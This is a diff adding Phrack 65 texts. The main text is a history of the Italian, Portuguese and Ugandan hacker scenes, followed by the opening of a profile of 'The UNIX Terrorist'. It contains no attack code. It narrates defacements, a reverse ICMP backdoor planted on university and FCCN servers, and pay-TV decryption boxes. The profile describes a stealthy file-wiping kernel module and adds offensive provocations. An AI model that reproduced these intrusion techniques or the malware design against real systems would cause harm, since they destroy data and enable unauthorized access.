+company in Italy, print the whole *fake* book "Netgeneration" (1996).
+
+As a consequence of the crackdown the Italian underground started
+feeling the need of an organization similar to the american EFF, able to
+support hackers against abuses. In 1995 ALCEI Electronic Frontiers
+Italy [4] was founded to "affirm and protect constitutional rights for
+electronic citizens as new communications technologies emerge".
+
+Nearly at the same time, Metro Olografix [5] was born, an association
+made by people with a mixed range of skills and histories, from
+cyberpunks and hackers to social volunteers, that nowadays counts about
+80 members. The main mission of Metro Olografix is to spread the
+telematics culture through the country supporting the old BBS spirit of
+sharing, free communication and cooperation. Metro Olografix has an
+office in Pescara for real life meetings and acts as a crossroads for
+other groups and individuals to meet. Thanks to the esteem and trust
+gained from the most part of the Italian underground, the association
+was able to organize events like "L'hacker e il magistrato" ("The
+hacker and the magistrate", from 1995 to 1999), a face to face
+conference involving hackers, magistrates and press reporters, aimed at
+communicating and making understand the difference between hackers that
+follow hacker ethic and real criminals.
+
+While BBS were still experiencing hard times, 1995 registered the
+boom of Internet access in Italy - mainly thanks to the VOL ISP that
+offered free promotional accounts, opened POPs in many cities reachable
+with a cheap urban rate call and at the beginning even provided a
+toll-free number. Internet access was no more limited to universities
+and the opportunity to have a relatively fast, cheap and long lasting
+Internet SLIP (later on PPP) connection from home marked the growth of a
+new generation of young hackers. Those guys started to study and play
+with TCP/IP protocols and they elected the Linux open-source operating
+system and the C programming language as their favourite study matters.
+Those wannabes were going to inject into the Italian underground new
+ideas within a few years and to create some valuable projects and
+groups.
+
+Like the new generation, old-school BBS hackers too got very
+interested in the communication opportunities offered by the Internet.
+Thanks to "Isole nella Rete" [6] (the Italian for "Islands in the Net"),
+the Internet connection of ECN, BBSs of the CyberNet circuit begun to
+put their contents online. Message areas turned into mailing lists and
+IRC channels like #cybernet were born on EFNet.
+
+=46rom 1987 to 1998 *the* fanzine of the Italian underground was Decoder
+(published by ShaKe Edizioni Underground, a cyberpunk cooperative based
+in Milan): covered subjects included hacking, hacktivism, networks,
+cyberpunk culture, counter-information, leading figures and events from
+the international scene, virtual reality and new technologies. As
+Decoder was the only printed underground zine during those years, a few
+hacking/phreaking e-zines were released: The DTE222 Technical Journal
+(1987) and The Black Page (1994): altough those experiences did not
+last as long as Decoder and did not focus on international scene, their
+technical level was considerable.
+
+In 1996 the first number of System Down was published, an e-zine
+written by some users of IRCNet channels #cybernet and #hackers.it.
+Quality and technical level of articles marked a drop compared to
+previous zines, because authors were largely young guys that had started
+hacking just after the Internet boom, they were not very conscious about
+hacker culture and the past works of the Italian underground.
+
+Year 1997 saw a flourishing of new groups that lived hacking mostly as
+study and research about programming, networks, operating systems,
+instead of catching its political value and focusing on its
+consequences for the society. In the beginning members of those
+organizations were for the most part low skilled, but many of them were
+higly motivated, tenacious, capable of learning quickly and they
+reached a very good technical level in a very few years.
+
+Orda delle Badlands was a crew especially dedicated to owning systems on
+Internet and to ircwar (deprecable activity, but widely exercised over
+those times). The experience exhausted in few years because the engine
+of the group was in fact the cooperation within actions engaged by its
+charismatic leader (that was nearly worshipped); in the long run that
+proved to be an insufficient incentive, the crew closed and some of its
+members joined other groups.
+
+Antifork [7] (formerly known as disLESSici) more than a crew is a
+'hackers research virtual lab', a place where hackers can share their
+techniques and codes following open source and full disclosure
+philosophies. Between Antifork members there are also creators of well
+known tools like ettercap. Antifork software is available through their
+website and public access CVS.
+
+The S0ftpj [8] group reunited people with different skills and
+backgrounds: cyberpunks, sysops, coders, virus writers, security and
+privacy researchers, hardware and network experts. Since the beginning
+the group stood out out by its will to collaborate and confront
+with other realities of the Italian underground (this explains the
+notable amount of its releases distributed via its website). S0ftpj team
+skills cover a wide range of fields - it has been contributing
+to many events in the country holding workshops mainly focused on
+its research in kernel hacking and new privacy enhancement technologies.
+
+In the meanwhile, as these new groups were appearing, the fusion between
+ECN/CyberNet hackers and the squat scene brought in 1998 to the first
+Hackmeeting [9], a yearly 3-days hacker con "without *organisers,
+teachers, public and customers* but with *sharers*", held in a T.A.Z
+[10] and then totally self-organized. Altough the level of its speeches
+is not always very high, Hackmeeting has become a unique opportunity to
+have fun and discuss with people from different realities and feel the
+informal atmosphere of old times - free of commercial influences. In
+1999 the second Hackmeeting promoted the idea of "hacklabs",
+laboratories mainly hosted by social centres where hackers could meet
+in real to share and develop their do-it-yourself attitute and their
+knowledge about programming, technologies, media activism, privacy and
+cyber-rights. After Freaknet Medialab [11], the first Italian hacklab
+and home of radio#cybernet, opened in Catania in 1995, other hacklabs
+popped out in biggest cities of the country (Florence, Milan, Bologna,
+Turin, Rome).
+
+In spring 1998, when System Down stopped publication, S0ftpj and Orda
+delle Badlands started a new e-zine called Butchered From Inside (BFi)
+[12] that dealt with various topics (h/p, virus, reversing, reports from
+cons, underground culture, ethics) following a semi-disclosure policy
+(no complete and ready to use exploits and tools, but techniques). At
+first the technical level of articles was low, but it quickly improved
+and from its second year of life it already distinguished itself by its
+originality and quality of its articles. BFi documented the growth of
+new characters in the Italian scene, in the course of time it adopted an
+acceptance policy for articles similar to the one used by Phrack and
+today is also read by non-Italian people thanks to its English, French
+and Spanish translations. BFi is written by hackers that belong to many
+organizations, indipendent researchers and, obviously, by S0ftpj
+members who have been editing and contributing during these years.
+
+BFi has provided an example of the good spirit and built a virtuous
+circle where new ideas and techniques, at first explained in the
+articles, inspired other hackers to develop them further and publish
+them in later articles. The feeling of a steady continuity between
+works made by different contributors was great, so BFi launched
+successful collaborations between hackers. In autumn 2001, BFi hosted
+an important debate about a subject that had been in the background for
+long time, but that had not been discussed publicly yet: feasibility of
+hacking without political connotations. That topic of course was not
+exhausted in that circumstance and was going to resurface periodically:
+that discussion anyway helped all parties to think about it and
+confront with each other: "politicals" understood that a big effort in
+experimenting new techniques was becoming foundamental to fight their
+battles efficiently, while "technicals" acquired a stronger
+consciousness of their actions.
+
+Sikurezza.org [13] has been another good project aimed to develop
+discussions about computer security. It was established in 1999 with a
+few open mailing lists, where advanced topics could be talked over by
+hackers in a vendor-free, no-profit and full-disclosure atmosphere.
+Unluckily, in parallel with the dramatic increase in subscribers and
+posters, the technical level of posts progressively and necessarily has
+decreased through the years, altough the list still represents an
+important community credited also by the underground. Moreover,
+researchers presenting themselves under Sikurezza.org umbrella dictated
+a new style and quality standard in security speeches for events held
+in Italy.
+
+Other active hacking groups in those years were Spippolatori, Packet
+Knights Crew and S.P.I.N.E.: some of them released interesting stuff
+but they all eventually closed by 2005. There were also many attempts
+to start new e-zines. Apart from OndaQuadra that contained also a few
+nice articles, quality was low and every new e-zine started talking
+about hacking from a very basic level instead of learning and catching
+inputs sent from other previous editorial experiences.
+
+New school Italian phreakers mostly have been interested in studying
+PSTN/ISDN, phone kiosks and magnetic cards, cellular cloning and VoIP.
+BFi published various articles on Fastweb, the biggest national fiber
+optic ISP. Fastweb Milan metropolitan network has been the favourite
+playground for pioneering VoIP and IPTV hacking. Since 1998 the
+Spaghetti Phreakers [14] website and mailing list have been an archive
+and meeting point to experiment and learn and contributed in keeping
+alive interest about phreaking among new generations.
+
+The Italian underground counts talented reverse engineers and software
+crackers; some of them have been members of renowned international
+cracking groups or the cracking university +HCU. Web sites like
+Universita' Italiana Cracking[15] (resembling the teaching style of
++HCU) and 3564020356 [16] have been running for many years and provide
+nice communities and huge archives of tutorials and technical documents.
+RingZ3r0 and RACL were other two groups that published good textfiles
+about reversing but they are no more active.
+
+Italy is a country with a long and prolific artistic tradition and the
+underground has got its own artists too. There have been many good demo
+groups (for a comprehensive list, check the site Scene-IT [17]) and
+some demo parties: "The Italian Gathering" organized by Metro
+Olografix from 1996 to 1998 in Pescara, a demoscene area within
+Codex Alpe Adria [18] (a wider event also featuring retrocomputing,
+emulation and alternative systems) from 2004 to 2006 in Udine and since
+2007 the HORDE [19] demoparty. Prof. Bad Trip [20] has been a peculiar
+experimental artist capable of interpreting cyberpunk offering a visual
+perspective on themes like cyborgs, mutants, polluted metropolis from
+a disturbed future and so on. It is worth mentioning, in the end, the
+graphic novel "Uccidere un Hacker" [21] (the Italian for "Killing an
+Hacker") by Andrea Ferraresso inspired by the story of the German
+hacker Karl Koch.
+
+In the field of privacy, a milestone was erected in 1998 with the book
+Kriptonite [22] written by hackers from ECN/CyberNet. Kriptonite
+extensively covered theory and practice of topics like cryptography,
+anonymous remailers, nym servers, steganography, voice encryption and
+packet radio.
+
+Somehow influenced by Kriptonite, Progetto Winston Smith (PWS) [23] has
+been working since 1999 to sensibilize netcitizens about the risks of
+technocontrol and network surveillance. PWS mantains a website
+providing information about privacy enhancement technologies, for both
+administrators and end users. Moreover PWS organizes every spring in
+Florence a free convention called E-Privacy [24]. The con develops in
+two tracks where privacy related topics are discussed at a legal and
+technical level; it also hosts the local cerimony of Big Brother Awards
+for the yearly best privacy violators in Italy. Besides E-Privacy there
+were other events about privacy and freedom organized by Metro Olografix
+like the Metro Olografix Crypto Meeting and Cyber Freedom.
+
+Autistici/Inventati (A/I) [25] was born in 2001 as a collective of
+people from hacklabs and media activist and its main effort has been to
+build a server that offers free services like web/blog/mail hosting,
+anonymizer, anonymous remailer and mailing list management for activits
+and people desirous of privacy. The A/I server, due its policy voted to
+free speech, had to be defended in tribunal many times. In summer 2005,
+A/I discovered that its server had been phisically compromised, and
+that the Italian police had had access to its SSL keys (which allowed
+them to monitor all the traffic for a whole year). The collective
+reorganized and deployed the so called "R* Plan": a fresh decentralized
+redundant network infrastructure with servers located in different
+countries and jurisdictions. As well as for any provided service, A/I
+made technical documentation for Plan R* [26] avaible on its site.
+Thanks to the work by PWS, A/I and individuals, Italy boasts various
+TOR and Freenet nodes as well as anonymous remailers and nym servers.
+
+Analyzing this short story so far you, the reader, could argue that the
+underground in Italy is very healthy, but unfortunately the expression
+"zombie-scene" used by Duvel in last Phrack issue [27] fits well its
+real current status.
+
+An alarming matter of fact is the big number of people once in the
+underground that now collaborate with computer crime units or work for
+companies providing malware and services to law enforcement agencies.
+These people have been largely contributing to the death of the the
+underground in Italy: even when they did not consciously fight other
+hackers, the lack of trust and paranoia acted as disgregating forces
+against groups and cooperations. The underground has shown not only it
+is not strong enough to refuse working for law enforcements, but it is
+not even able to isolate people that publicly claim to partecipate and
+belong to the underground while at the same time working for the police.
+
+Wounds are made to the underground not only by the ones who explicitly
+want to strike it, but also from entities willing to exploit it. The
+Hacker Profiling Project (HPP) applies criminal profiling methodology to
+enable analysts to identify the kind of attacker and to anticipate his
+next moves. It tries to accomplish its goal by collecting
+questionnaires from hackers and deploying honeynets. Altough HPP
+creators, that are italians, promote their work between hackers
+stating they want to break stereotypes about the hacker figure, this
+sounds a bit bizarre... their real goals are quite evident to
+everybody. Zone-H [28] is another attempt to suck from the underground
+giving back shit to it. The archive of defaced websites lacks the good
+spirit of the old Attrition.org and the primary purpose of the
+portal activities is to keep high the perception of an evil hacker
+menace to sell more ethical hacking courses and services. The
+organization has been able to attract a few young guys and exploit them
+in borderline actions (the founder has been arrested in connection to
+the Telecom Italia spying scandal [29]). It seems that in italy the
+more people use the word "ethical" the less they prove to really have
+an ethic.
+
+Like everywhere, nowadays many Italian hackers are in the security
+business and have stopped releasing their advances and works through
+underground channels. The problem is not the fact that they speak at
+commercial cons, but the limited amount (and sometimes lack of free
+access) of knowledge they usually provide in such events. Those people
+largely made their bones inside the underground communities and they
+learnt a lot from underground publications and releases. It is then
+auspicable that hackers working in security field would keep showing
+their slides at cons but also give back to the underground what it
+deserves, that is a detailed view of their researches to let other
+hackers study, learn from and improve (or thwart, this is part of the
+game, sorry) them.
+
+In this discouraging scenario the hackmeeting community has been always
+managing to wake up a few mounths before the yearly meeting and make it
+a nice event, but it has experienced difficulties in bulding a
+continuity of activities during the rest of the year between
+consecutive meetings. Number of hacklabs in the country also decreased
+in last years. In 2004 Metro Olografix organized MOCA, a hacker summer
+camp run in Pescara that resembled the CCC camp and was a great
+success. The experience it is likely to be repeated in summer 2008. In
+recent times Net&System Security has stood out among technical cons
+because of medium-high quality of its speeches; the con is held every
+year in Pisa. Old groups appear dormient and only a few public releases
+are published. Also BFi magazine has progressively decreased its number
+of articles per year until 2006, but last year marked an inversion of
+this trend that made room for a hope in a renewal of activity in a near
+future. A few new groups have released good stuff but their names are
+not cited here because they are not underground-only oriented - they
+also offer business solutions.
+
+Italian underground is still active, but most of old hackers keep a
+low profile and rarely make their works publicly available. Most groups
+and e-zine sites has been put offline by their staff depriving new
+generations from accessing a part of the underground history and
+culture. The underground should exploit new web technogies to regain
+its past visibility and influence (do "media saturation" and "cDc"
+remind you of anything?) on young talents to offer an alternative
+perspective than the one proposed by the world of commercial security.
+
+Hackers now employed in the ICT industry should understand the risks of
+underground death and make an effort to spread knowledge coming from
+their research through underground vectors and methods and taking back
+advantages offered by a review and comparison with the community.
+
+Limits imposed by new laws and extended technocontrol would hopefully
+act as a strong incentive for the underground to get more united and
+reactive.
+
+Hackers role is to make the future more *free*, not (only) more (IT)
+secure. Join the underground, keep working for and with the underground
+if you care about your freedom, in Italy and everywhere.
+
+
+
+[0] International Scenes
+    Phrack Magazine Volume Six, Issue Forty-Seven, File 21 of 22
+    http://www.phrack.org/issues.html?issue=3D47&id=3D21
+[1] E.C.N. European Counter Network
+    http://www.xs4all.nl/~tank/ecn/
+[2] PeaceLink
+    http://www.peacelink.it/
+[3] Luther Blisset
+    http://www.lutherblissett.net/
+[4] ALCEI Electronic Frontiers Italy
+    http://www.alcei.it/
+[5] Metro Olografix
+    http://www.olografix.org/
+[6] Isole nella Rete
+    http://www.ecn.org/
+[7] Antifork
+    http://www.antifork.org/
+[8] S0ftpj
+    http://www.s0ftpj.org/
+[9] Hackmeeting
+    http://www.hackmeeting.org/
+[10] Temporary Autonomous Zone
+     http://en.wikipedia.org/wiki/Temporary_Autonomous_Zone
+[11] Freaknet Medialab
+     http://www.freaknet.org/
+[12] Butchered From Inside
+     http://bfi.s0ftpj.org/
+[13] Sikurezza.org
+     http://www.sikurezza.org/
+[14] Spaghetti Phreakers
+     http://www.spaghettiphreakers.tk/
+[15] Universita' Italiana Cracking (UIC)
+     http://www.quequero.org/
+[16] 3564020356
+     http://3564020356.org/
+[17] Scene-IT [!]
+     http://scene-it.untergrund.net/
+[18] Codex Alpe Adria
+     http://www.0xaa.org/
+[19] HORDE
+     http://horde.untergrund.net/
+[20] Prof. Bad Trip
+     http://www.profbadtrip.org/
+[21] Uccidere un Hacker
+     http://digilander.libero.it/code6502/
+[22] Kriptonite
+     http://isole.ecn.org/kriptonite/
+[23] Progetto Winston Smith
+     http://www.winstonsmith.info/
+[24] E-Privacy
+     http://e-privacy.winstonsmith.info/
+[25] Autistici/Inventati
+     http://www.autistici.org/
+[26] Plan R* Orange Book
+     http://dev.autistici.org/orangebook/
+[27] A brief History of the Underground scene
+     Phrack Magazine Volume 0x0c, Issue 0x40, Phile #0x04 of 0x11
+     http://www.phrack.org/issues.html?issue=3D64&id=3D4
+[28] Zone-H
+     http://www.encyclopediadramatica.com/Zone-H
+[29] Telecom-SISMI Scandal
+     http://en.wikipedia.org/wiki/SISMI-Telecom_scandal
+
+---------------------------------------------------------------------
+
+
+                           The Portuguese Scene
+                          ----------------------
+
+                        (By Eurinomo and Quickzero)
+
+
+
+- The evolution of the Internet
+
+When Internet showed up, it was very expensive, even around 96/97 we
+had to pay something like 1.50Euros per hour to the ISP, plus, around 
+1 Euro per hour to the Phone company for a Dial-up connection.
+
+Some years later, internet got cheaper, in fact, free! ISPs started racing
+on giving away free dial-up accounts without any limitation of time, they
+even gave CDs with already created accounts. Still, we had to pay
+the phone company.
+
+Around 2000/2001, ADSL and cable connections started showing up, it was
+kind of cheap, around 35Euros per month for a 512k connection, plus the
+15Euros per month for the phone line or cable. There were no time
+limitations, only traffic limitation around 3GiB. A lot of people started
+showing online, for most of them Internet was a new world. Some people
+started creating domestic servers, sharing information, code, and
+software.
+
+Years later, 24mbps connections were made public using ADSL2+, and it just
+cost around 35Euros per month on total, with 60GiB traffic limit, so
+people started to take this advantage to trade games and movies.
+
+On the present date, OC connections are available to the public on the
+capital (Lisbon), an OC connection, up to 60Mbps, costs something around
+50Euros per month.
+
+On resume, we had a slow start on internet service, but now he have a kind
+of quick evolution.
+
+
+- The evolution of technology
+
+Technology always has been expensive, even now, electronic parts are very
+expensive, but computers, are getting cheaper and cheaper.
+
+I remember when I bought my first x86, it was a used Pentium-90, 16MiB of
+ram, 1GiB of HD, this all inside a heavy Big-Tower, it cost something
+around 700Euros, remembering that it was a used computer, and the cheapest
+price I could find, the best computer around that time was a Pentium-133.
+A new computer (Pentium-133) cost something around 2000Euros.
+
+Around 2000/2001, computers started to get cheaper, more people started to
+buy computers (at that time, not many people had one).
+
+On the present date, anyone can buy a good complete computer (or laptop)
+with less than 400Euros.
+
+Only recently with this cheap technology, government and other high
+entities documentation and information meet the digital world, most of it
+is/was stored in hand made paper work.
+
+
+- The evolution of society
+
+Portuguese people may have an extreme reputation on sailing and
+discovering
+'new worlds', but it seemed that all this ended up a few centuries ago.
+
+Nowadays, society is a lot stupid and ignorant, they started to loss the
+pride of being Portuguese, the pride of the world not being enough for
+everyone and still having half of it on they're hands, the courage to make
+discoveries, and ending up on people that are happy if they have food on
+the table, and a good reality show or soap opera on TV.
+
+Society gives more value to someone that does something using the tools of
+other person, that the person that made those tools. Per example, they
+consider an expert, someone that unlocks mobile phones without knowing
+what he is actually doing, without knowing what is behind it. They give 
+more importance to someone wearing a tie, than someone dressed normal, 
+they also give more importance to someone that doesn't know what he is 
+talking about but has a PhD or something, that someone that knows a lot 
+about what he is talking about, but doesn't have any diploma.
+
+The term 'hacker', is not very popular in society, the last time it
+appeared on TV was two years ago, in the format of a interview with
+someone calling himself 'buzzybee', he was only a script kiddie that did
+some defacing and carding, was self proclaiming himself a 'hacker' and
+showed up on the news, saying that he was able to do get free stuff using
+carding, and had access to any site of the internet and so on, everyone
+that was in the scene knew this kid real name, phone, address and age,
+even thought he hadn't many problems with the police.
+
+
+- The evolution of the scene
+
+Finally the part of most interest, the Portuguese scene is kind of
+obscure, almost no one outside the scene knows what in fact is going on. 
+No one knows when the scene really started since it started before 
+the boost of telecommunications, a guess goes around 70s and 80s.
+
+In the 90s, some groups started to show up, groups like Kaotik, Pulhas,
+Ironik and a few others, even an e-zine came up, called 'PT Zine',
+but died on the third release. Some of the groups still exist to this 
+day, but not much information comes out of it. Also, some individual 
+people started to show up in the form of Hackers, Crackers and 
+Phreakers.
+
+The most notorious groups were:
+
+Pulhas: Founded in 1994 by  Kennobi. This was the oldest Portuguese group.
+Actually is 'dead', but they had their golden age in the 90's by the
+inumerous papers that they wrote and the exploit/code database to the
+Portuguese mainstream.
+
+Toxyn: Founded in 1996 by m0xx. This group is notorious known by their
+campaign against Indonesia, when East Timor was occupied by Indonesia
+millitary.  The attack against the IT indonesian infrastracture was
+motivated by the currently abuses of Indonesian military officers against
+east timor people. Toxyn start their campaign with this statment: "We hope
+to call attention to the necessity of self-determination and independence
+of the people of Timor, oppressed and violated for decades by the
+government of indonesia. We hope you give your full attention to this
+historical step towards freedom, we ask that you help us fight the tyranny
+of Indonesia occupating Timor." The campaign was started at 10/2/1997.
+The fall of the Toxyn, has began when m0xx, has accepted and gave
+inumerous interviews about the campaign and about the portuguese hacker
+scene, exposing plans and actions of the scene. Toxyn group was helped
+by Savage, an known spanish hacker, who developed the exploit, that
+Toxyn Group used to break in in the .ID servers.
+
+KaotiK: Founded in 1997(??). They've been a very active group in the
+East Timor campaign, hacked and defaced inumerous .id websites. They've
+created the first ezine about hacking & security to Portuguese people.
+The e-zine was extinct after 3 editions. KaotiK has reach their fame in
+the Portuguese Scene after a member disclosure of some flaws in various
+Microsoft products.
+
+F0rpaxe: F0rpaxe was maybe, the most mediatic group/'hacker'/troll, for
+the worst reason. This character was the responsable for the first major
+attack against US .mil targets in 1999. The attacks were allegedly being
+carried out in retaliation for Federal Bureau of Investigation (FBI) raids
+on suspected "crackers" in several U.S. cities. The attacks hits various
+governemental and military webservers including FBI, NSA and the Navy.
+
+East Timor Campaign: Was one of the  firsts major hackivism campaign
+worldwide. Timor was in Portuguese administration until 1975, after
+Portuguese government abandoned that country, Timor was invaded by
+Indonesia military army, who oppressed, violated, raped and murdured for
+most 20 years. Various Portuguese hackers and groups decided to begin a
+campaign to show to the world the truth about the Indonesian occupation
+in East Timor. The East Timor campaign started in 1997 and was finished
+in 1999. Various military, governement and corporativ indonisian websites
+had been defaced. The defaces was to aware all people in the world about
+the illegal occupation of East Timor, the mission was accompliced, the
+attacks were transmited to the media all over the world. The campaign
+was finished when m0xx, the lider of the group Toxyn, gave inumerous
+interviews to the midia, exposing then the entire portuguese scene to the
+public.
+
+[5~Between 2002 and 2004, two Portuguese hackers also did some 'infamous'
+work, these two hackers gained access to FCCN ('Fundacao para a
+Computacao Cientifica Nacional' / Foundation for National Scientific
+Computation), witch was backdoored with a reverse ICMP backdoor developed
+by them, witch rumours say it is still active. They also gained access
+to numerous universities and were backdoored the same way, this includes
+the 100 machines cluster 'Centopeia' from 'Faculdade de Coimbra'. A lot
+more work was made, including the database server of 'A.M. Gonçalves' and
+'Salvador Caetano', Portuguese Toyota distributor. Then they just
+disapeared from the scene.
+
+Some of the people inside the scene are found on the x86 '0xD9D0', those
+whom know, know what I'm talking about.
+
+On the start of the new millennium, an explosion of 'lame' groups started,
+most of them were kids playing up with Trojans, others, were script kids
+playing up with public exploits, most of this groups are found on a
+Portuguese IRC network, called PTNet. Some of these kids turned up to be
+carders, using databases found by 'Google hacking', or simply by asking
+people on some IRC networks. Some of these kids ended up having problems
+with the police, but nothing serious.
+
+Also in the start of the new millennium, satellite and cable Phreakers
+starter to show up, breaking encrypted signals, an unnamed box came out,
+that was plugged in the TV SCART connection and an external 9v power
+supply, and unlocked (in fact, it broke the Nagravision encryption) every
+single channel there was on cable TV, this box for a long time was though
+to be made outside of Portugal, until I had the pleasure to meet the
+original creator of it, and guess what, he was Portuguese, and lived next
+to me, he explained me how it really worked, and how was the original
+version, since the version that everyone had, that was commercialized
+by lame groups searching for profit, had way too much components that it
+didn't need at all, it even got some traps, only to make itself more
+expensive, and difficult to make, in order to avoid people
+commercializing it. Also, satellite FTA boxes started to get themselves
+modified nationally, in order to break satellite TV encryptions,
+like Nagravision (used by or cable TV provider, 'TVCabo'). So did the
+original TVCabo cable boxes, some national hackers were able to hack
+the firmware, in order to get its unique ID (Boxkey), and created cards
+that once plugged, were able to break the signal. After this, this
+knowledge started to get public, but on a 'pratical' way, and lots of
+people started to make profit out of it, without knowing what they were
+really doing. In other words, they knew if they bought this and that, and
+used this and that software, were able to have free satellite/cable TV,
+and they could seal later to other people. An example was the first
+unnamed box that was created, it cost 4Euros to build, but people were
+sealing it up to 100Euros. So do the FTA boxes, cost something around
+70Euros unmodified, and were sold for 250Euros modified at no cost.
+
+Nowadays, the scene is still obscure, and people are still ignorant,
+sometimes, there is an exception, like when I went to an interview to
+a part of the Bosch Group, where the guy interviewing me, by reading my
+curriculum started to laugh silently, and said to himself 'A hacker..' and
+'hackers do not harm anyone... only if pushed too', without me making any
+mention to illegal activities (duh) or being member of this or that group.
+When I was guessing myself unemployed, I got myself well employed, and
+working on more areas than I was asked to, I even got myself involved
+with robotics, automation, and electronics, when I was attending the
+interview as web developer for an Intranet. Later, we found out that I
+already knew him from the scene, and so did he knew me.
+
+
+-----------------------------------------------------------------------
+
+			Ugandan Scene(surprise!!!!!)
+			============================
+     			       by gmac
+
+Introduction
+------------
+
+For those who don't know what Uganda is n are too lazy to use google, well
+in short its located on the African continent more specifically in Eastern
+africa. Still lost then this will clear it all up for you, have you ever
+heard of a movie called Last King of Scotland if yes then you know Uganda
+and if No then use google.
+
+Sometime back.....
+------------------
+
+Cutting edge computer technology is as you correct in assuming fairly new
+in the Ugandan context, it cannot be more than 13 years old so generally
+hacking on our scene had maintained a fairly urban legend status, not much
+is avaliable on any hacking groups back in the day to be honest to my
+knowledge they were almost none existent.
+
+
+Present....
+-----------
+
+Currently as technology advances the scene has surfaced with formation of
+groups like gsquad by yours truly which is i believe the first of its kind
+here, although hacking has still maintained its urban legend status the
+scene is dominated by a few knowledgeable individuals. Bu..t the winds of
+change are upon us because i have seen the advent of a new generation with
+a desire which ofcourse has been fueled by hacker related movies like most
+recently Die Hard 4.0. The gsquad remains the only active group providing
+help to individuals on request and ofcourse releasing zines(which was but
+made a print debut recently) which has won many fans but ofcourse inspired
+by Phrack. This new generation needs content and i think Phrack is our one
+stop Hacking Content Provider (HCP,oh i made that up).
+
+We are late comers onto the scene but we will catch up because we have the
+spirit, and oh it was BloodAxe's first appeal that drove me to starting
+the gsquad so i hope the circle of lost hackers' appeal will inspire 
+another individual somewhere on this planet.
+
+We maybe in different lands but we are part of the same underground, so we
+will survive the media caused division which started all these different
+kind of hats i hear white hats....erm...black...grey we may soon hear pink
+hats(ie blondes running security sites)
+
+The spirit still lives on but its in a critical state......
+
+
+Busts....
+---------
+
+This is almost a trivial joke because without any real laws noone can get
+busted, but there is a motion to release laws due to rising fraud cases.
+But of course there have been cases of major censorship, call monitoring
+and all that by ISPs and of course the govt.
+
+
+Appeal....(am sorry to put this part but i had to)
+----------
+
+I read the Underground Spirit article and i really think the onus is
+on all of us to stage what i would call "a last stand" [like in X3] to 
+stop the decline of the underground. Lets not stop at reminiscing the 
+days of Mentor, BloodAxe, KL, the drama involving Agent steal and the 
+like and start living them and all this starts with each individual 
+making this "stand" a personal thing not just a battle for the circle 
+of lost hackers or a few individuals. I really think what has hampered 
+the growth of the underground has been lack of.....lets call it 
+selfishness by the knowledgeable(read 3l33t) who undermine those new 
+to the scene hence making them only become script kiddies atmost. 
+This unwillingness to share knowledge has seriously hampered the
+underground's growth making the curious hunt for this knowledge from
+"security" sites.
+
+Underground...Underground..... UNDERGROUND we have a platform of
+change and that platform is PHRACK...
+
+Hey sorry it sounds like a battle cry...but it is!
+
+Long live Phrack
+
+
diff --git a/phrack65/2.txt b/phrack65/2.txt
new file mode 100644
index 0000000..800fe5b
--- /dev/null
+++ b/phrack65/2.txt
@@ -0,0 +1,656 @@
+                             ==Phrack Inc.==
+
+                 Volume 0xc, Issue 0x41, Phile #0x02 of 0x0f
+
+|=------------------------=[ PHRACK PROPHILE ON ]=----------------------=|
+|=----------------------------------------------------------------------=|
+|=------------------------=[ The UNIX Terrorist ]=----------------------=|
+|=----------------------------------------------------------------------=|
+
+
+In this issue of Phrack, we have renewed with publishing the prophile
+of an influencial underground character. The UNIX terrorist was already
+prophiled two years ago but for some editorial reasons at the time, we 
+were not able to get his prophile published. Now that the Phrack editorial 
+staff has less open conflicts with some part of the scene represented by 
+the_uT, we want to make sure everyone remember his engagement. A lot of 
+people believed he was an extremist blackhat hacker proning non-disclosure
+during his time of activity. That was true. But he was not just this.
+
+I have known the UNIX Terrorist in real life seven years ago. At this time,
+during his youth, the_uT was a softer hacker. Dont get me wrong, the_uT 
+(or whatever he was calling himself before) always had this characteristic
+personality that made him an exceptionally creative dude. Later on, after 
+he started body-building (rumors mention that he followed the advices of 
+his idol Mike Shifman), he got that impressive shape that certainly 
+represented better his mind shift towards a more aggressive prophile. The 
+UNIX terrorist is the result of this evolution from a young skilled hacker 
+to a disabused philosopher of the underground.
+
+This prophile was realized by The Paper Street Hacker in November 2007
+for publication in Phrack Magazine #65 by TCLH. Remember the opinion 
+reflected in this interview only engages the UNIX Terrorist and does not 
+represent the opinion of the Phrack editors. 
+
+So here it is.
+
+    
+|=---=[ Specifications
+                                                         
+           Handle: the_uT
+              AKA: daemon10, yu0, jungjeezy
+    Handle origin: Africa
+ Age of your body: 24
+      Produced in: The Heart of Darkness, USA
+        Living in: The Paper Street Soap Company, USA
+  Height & Weight: Excessive" / 250lbs
+             Urlz: http://web.textfiles.com/ezines/EL8/
+        Computers: Anything with a network connection and a working ssh
+                   client will do... I'd rather spend my money on clothes
+                   & entertainment... less tech garbage also means my
+                   bedroom doesn't scare the bitches away
+       Creator of: PROJEKT MAYHEM / Phrack High Council / anti.security.is
+         Admin of: Most of South Korea/China ... 
+        Member of: NAMBLA (proud sponsors of TOR!) / ANONYMOUS
+         Projects: M4YH3M
+	    Codez: stealthrm, the first blackhat RM(1) utility, designed
+	           to rm desktop computers silently. Distributed as a 
+                   Linux LKM, VFS functions are hijacked so that file 
+                   indexing and rm'ing can be smuggled and interleaved 
+                   discretely amongst existing file operations. 
+                   Additionally, keyboard I/O is monitored to determine 
+                   the sysadmin's presence. Sporadic file wiping occurs 
+                   either during heavy PLANNED system hard drive use, or 
+                   occurs slowly and steadily, with timed delays, while 
+                   the console user is absent. The primary purpose is to 
+                   avoid the alarming and sickeningly unexpected HDD 
+                   "crunching" sound that alerts many would-be "rm -rf /"
+		   victims to their impending doom. File removal is 
+                   scheduled according to a proprietary prioritization 
+                   algorithm whose factors include criteria such as 
+                   inode atimes and VFS type. Files are secure DOD-wiped 
+                   in place, but not unlinked, preserving disk statistics.
+     Active since: 1998
+   Inactive since: I don't sleep... I metastasize
+
+|=---=[ Favorites
+										
+	  Actors: Assorted government officials, "security experts,"
+	          and "spiritual leaders" ... Scientologists
+	   Films: Apocalypse Now Redux, Happiness, Gummo, Pi, The Big
+	          Lebowski, Bad Boy Bubby, Irreversible
+	 Authors: Bret Easton Ellis, Louis-Ferdinand Celine, Hunter S
+	          Thompson, William S Burroughs, Will Self, Irvine Welsh,
+		  H.L. Mencken, Mark Twain
+	Articles: "The New Hacking Manifesto" - warez mullah, PHC Phrack
+	          #62
+		  "lyfestylez of the owned and lamest" - r0b1nleech,
+		  ~el8 3
+	  Admins: hendy of team-teso, The Digital Ebola[LoU],
+	          pm/sneakerz.org
+	   Books: The Rise and Fall of the Third Reich, The Rape of
+	          Nanking, The Protocols of the Elders of Zion
+	   Novel: Fight Club, 120 Days of Sodom, American Psycho,
+	          Journey to the End of the Night, The Picture of 
